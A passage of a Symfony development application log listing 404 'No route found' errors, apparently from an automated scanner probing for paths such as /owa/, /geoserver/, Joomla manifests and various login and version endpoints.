  5195. [2025-12-19 09:30:58] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /dashboard/"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /dashboard/\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  5196. [2025-12-19 09:30:58] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /user"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /user\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  5197. [2025-12-19 09:30:58] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /geoserver/index.html"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /geoserver/index.html\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  5198. [2025-12-19 09:30:58] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /geoserver/"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /geoserver/\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  5199. [2025-12-19 09:30:58] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /evox/about"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /evox/about\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  5200. [2025-12-19 09:31:00] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /owa/"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /owa/\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  5201. [2025-12-19 09:31:02] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /geoserver/web/wicket/bookmarkable/org.geoserver.web.AboutGeoServerPage"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /geoserver/web/wicket/bookmarkable/org.geoserver.web.AboutGeoServerPage\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  5202. [2025-12-19 09:31:03] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /webui/index.html"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /webui/index.html\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  5203. [2025-12-19 09:31:03] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /owa/"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /owa/\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  5204. [2025-12-19 09:31:03] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /magento_version"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /magento_version\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  5205. [2025-12-19 09:31:03] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /api/v1/check-version"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /api/v1/check-version\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  5206. [2025-12-19 09:31:03] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /xml/info.xml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /xml/info.xml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  5207. [2025-12-19 09:31:03] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /Account/Login"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /Account/Login\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  5208. [2025-12-19 09:31:03] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /cgi-bin/info.cgi"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /cgi-bin/info.cgi\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  5209. [2025-12-19 09:31:04] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /CFIDE/componentutils/"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /CFIDE/componentutils/\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  5210. [2025-12-19 09:31:04] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /cluster/list.query"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /cluster/list.query\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  5211. [2025-12-19 09:31:04] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /apps/zxtm/login.cgi"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /apps/zxtm/login.cgi\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  5212. [2025-12-19 09:31:04] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /api/server/version"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /api/server/version\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  5213. [2025-12-19 09:31:04] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /administrator/manifests/files/joomla.xml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /administrator/manifests/files/joomla.xml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  5214. [2025-12-19 09:31:06] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /versa/login"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /versa/login\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  5215. [2025-12-19 09:31:07] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /language/en-GB/en-GB.xml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /language/en-GB/en-GB.xml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  5216. [2025-12-19 09:31:07] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /login.html"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /login.html\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  5217. [2025-12-19 09:31:07] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /p/login/"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /p/login/\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  5218. [2025-12-19 09:31:07] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /status"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /status\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  5219. [2025-12-19 09:31:07] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /portal/"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /portal/\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  5220. [2025-12-19 09:31:07] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /cgi-bin/param.cgi"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /cgi-bin/param.cgi\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  5221. [2025-12-19 09:31:07] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /api/version"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /api/version\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  5222. [2025-12-19 09:31:07] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /info.asp"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /info.asp\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  5223. [2025-12-19 09:31:07] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /lms/db"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /lms/db\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  5224. [2025-12-19 09:31:11] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /c/login"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /c/login\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  5225. [2025-12-19 09:31:11] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /login/login.html"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /login/login.html\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  5226. [2025-12-19 09:31:11] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /allversions"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /allversions\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  5227. [2025-12-19 09:31:11] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /versions"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /versions\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  5228. [2025-12-19 09:31:11] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /api/vip/i18n/api/v2/translation/products/vRNIUI/versions/1"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /api/vip/i18n/api/v2/translation/products/vRNIUI/versions/1\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  5229. [2025-12-19 09:31:11] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /login.aspx"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /login.aspx\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  5230. [2025-12-19 09:31:11] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /officescan/console/cgi/cgiChkMasterPwd.exe"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /officescan/console/cgi/cgiChkMasterPwd.exe\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  5231. [2025-12-19 09:31:11] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /IPCamDesc.xml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /IPCamDesc.xml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  5232. [2025-12-19 09:31:11] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /kylin/"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /kylin/\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  5233. [2025-12-19 09:31:13] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /api/v1.0/environment"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /api/v1.0/environment\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  5234. [2025-12-19 09:31:13] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /config"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /config\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  5235. [2025-12-19 09:31:13] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /cslu/v1/core/conf"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /cslu/v1/core/conf\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  5236. [2025-12-19 09:31:13] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /admin/reports/status"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /admin/reports/status\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  5237. [2025-12-19 09:31:13] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /admin/reports/updates"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /admin/reports/updates\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
